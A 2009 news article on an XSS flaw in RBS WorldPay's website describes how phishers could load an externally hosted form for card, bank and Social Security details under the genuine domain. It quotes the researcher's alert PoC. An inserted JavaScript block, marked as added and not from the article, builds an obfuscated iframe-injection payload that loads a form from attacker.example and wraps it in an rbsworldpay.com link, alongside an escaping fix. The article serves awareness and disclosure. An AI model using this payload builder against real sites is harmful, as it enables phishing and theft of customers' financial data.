XSS weakness allows arbitrary IFrame injection

May 23, 2009 10:22 GMT  ·  By

A cross-site scripting (XSS) vulnerability discovered in the website of RBS WorldPay allows attackers to launch highly convincing phishing attacks against customers. The same flaw can also be exploited to serve malware or display rogue alerts.

The XSS weakness has been discovered and documented by a Team Elite member, going by the online handle of Methodman. The grey-hat hacker has previously disclosed similar vulnerabilities in numerous high-profile websites.

In this particular case, however, the threat is much more serious, because cybercrooks have already displayed a real interest in RBS WorldPay. We recently reported that the company's customers had been targeted by malware distributors via malicious spam e-mails.

In order to raise awareness, we decided to describe a proof-of-concept phishing attack that leverages this vulnerability to significantly increase its credibility and success rate. The scenario starts with the attackers creating a simple HTML form for inputting sensitive information such as credit card details, bank account number, name, address, Social Security number, etc.

This form can then be hosted on a third-party server under the control of the attackers and configured to save the submitted information into a database. Furthermore, styling and other details can be added to the form to make it appear legitimate. This can include a full header with the RBS WorldPay logo, as well as a footer with company contact information and a copyright notice.

The next step would be crafting a phishing e-mail with a spoofed From field, so that it appears to originate from an @rbsworldpay.com address. The subject and message could give a plausible reason why customers would be required to fill in the rogue form. Up to this point, this would look like any other e-mail phishing attack, but here is where the attackers can exploit the XSS weakness to get an edge.

The link to the form included in the e-mail could point to a malformed rbsworldpay.com URL which, when opened, injects an IFrame into the legitimate page. The IFrame can load the externally hosted form and can easily be styled to blend into the page. You can check out our screenshot to see how we loaded Softpedia content into the RBS WorldPay website.

Wary users hovering the mouse pointer over the link in the e-mail will see an http://www.rbsworldpay.com URL, which will also be displayed in the address bar of the browser when the page is opened. The standard advice to check that the domain in the address bar is the genuine one offers no protection here, because it is. This is a significant advantage for the phishers in terms of credibility.

However, the level of trickery that can be achieved does not stop here. The <iframe> markup need not appear literally in the malformed URL, where a user inspecting the link in the e-mail client might notice it: a <script> payload can assemble the markup at run time, for instance from character codes. Methodman's own PoC uses this technique to prompt an alert reading "XSS": <script>alert(String.fromCharCode(88,83,83))</script>

Granted, instead of seeing an <iframe> tag, users would then see a <script> tag; however, malicious IFrames are a common feature of XSS attacks and have received much more media attention. Less technical users might therefore be alerted by the presence of an IFrame in a link, while a script tag is unlikely to trigger the same response.
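The following is an added example, not code from the article or from Methodman's PoC. It shows the mechanics described above: the <iframe> markup is encoded as a String.fromCharCode(...) expression (the same encoding the PoC uses for "XSS") and written by a <script> payload at run time, so the literal string "<iframe" never appears in the phishing URL. It also contrasts a page that reflects a query parameter into HTML unescaped with one that escapes it first, which is the fix that makes the whole chain fail. The host path, the "q" parameter name and the attacker form URL are assumptions chosen for illustration.

```javascript
// Added example; the URL path, parameter name and attacker host are hypothetical.

// Encode a string as a String.fromCharCode(...) expression.
// toFromCharCode("XSS") yields the expression used in the article's PoC alert.
function toFromCharCode(s) {
  const codes = Array.from(s, (ch) => ch.charCodeAt(0));
  return `String.fromCharCode(${codes.join(",")})`;
}

// Reverse the encoding without eval(): pull the numbers back out of the
// expression. This is what the browser ends up with when the script runs.
function decodeFromCharCode(expr) {
  const inner = expr.slice("String.fromCharCode(".length, -1);
  return String.fromCharCode(...inner.split(",").map(Number));
}

// Build a <script> payload that writes an <iframe> at run time. The iframe
// markup exists only as character codes, so "<iframe" is not in the payload.
function iframePayload(src) {
  const markup =
    `<iframe src="${src}" style="border:0;width:100%;height:600px"></iframe>`;
  return `<script>document.write(${toFromCharCode(markup)})</script>`;
}

// Vulnerable reflection: the query parameter is dropped into HTML verbatim.
function vulnerableRender(q) {
  return `<h1>Search results for: ${q}</h1>`;
}

// Hardened reflection: escape the HTML-significant characters first, so the
// payload is displayed as text instead of being parsed as markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}
function hardenedRender(q) {
  return `<h1>Search results for: ${escapeHtml(q)}</h1>`;
}

// The link placed in the phishing e-mail: genuine host, payload in the query.
function phishingUrl(payload) {
  return "http://www.rbsworldpay.com/search?q=" + encodeURIComponent(payload); // path and parameter are assumptions
}

// Constructed sample run.
const attackerForm = "http://attacker.example/form.html"; // constructed
const payload = iframePayload(attackerForm);
const link = phishingUrl(payload);
console.log(link);
console.log("vulnerable page parses a <script>:", vulnerableRender(payload).includes("<script>"));
console.log("hardened page parses a <script>:", hardenedRender(payload).includes("<script>"));
```

Running it prints a link whose visible host is the real one while neither "<iframe" nor "iframe" appears anywhere in it; the vulnerable page turns that into a live <script> element, the escaped page renders it as harmless text.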

What users should learn from this example is that even if the URL in an e-mail asking for their personal and financial details points to a legitimate domain name that they know and trust, they should take additional steps to confirm its legitimacy. Calling the company over the phone and asking about it is always a good idea, using a number taken from a statement or card rather than one supplied in the e-mail. When this is not possible, the official contact e-mail addresses listed on its website can be used to submit such a query.

RBS WorldPay is an Atlanta-based company operated by The Royal Bank of Scotland Group. It offers payment processing solutions that cover credit, debit, Electronic Bank Transfers, gift cards, customer loyalty cards, checks, ATM, and tailored solutions for the retail, restaurant, petroleum, convenience store, grocery, hospitality, transport and card-not-present sectors.

The company has seen its share of security-related incidents in the past. Back in December 2008, RBS WorldPay announced that unknown hackers had penetrated its computer infrastructure, installed malware on its systems and intercepted financial data passing through the network. It was later revealed that 100 re-loadable payroll cards compromised during the breach had been used in one of the largest and most complex payment card fraud operations in history, which earned the cybercrooks an estimated $9 million.

As a result of the incident, Visa later removed RBS WorldPay from its list of service providers compliant with the Payment Card Industry Data Security Standard (PCI DSS). Despite this, the company went on to win an IRS government contract to process tax-return payments starting in 2010. On May 11, 2009, RBS WorldPay was re-certified as compliant with PCI DSS, following an audit performed by Verizon Business/Cybertrust.

Note: At the time of writing this article, the vulnerability described above was still active. As a result, we have contacted RBS WorldPay as well as its parent company, The Royal Bank of Scotland Group, using three different e-mail addresses that we were able to locate and we will return with more information as/if it becomes available.

Photo gallery (3 images): RBS WorldPay website vulnerable to XSS attacks; IFrame injection in RBS WorldPay website; Rogue JavaScript alert on RBS WorldPay website.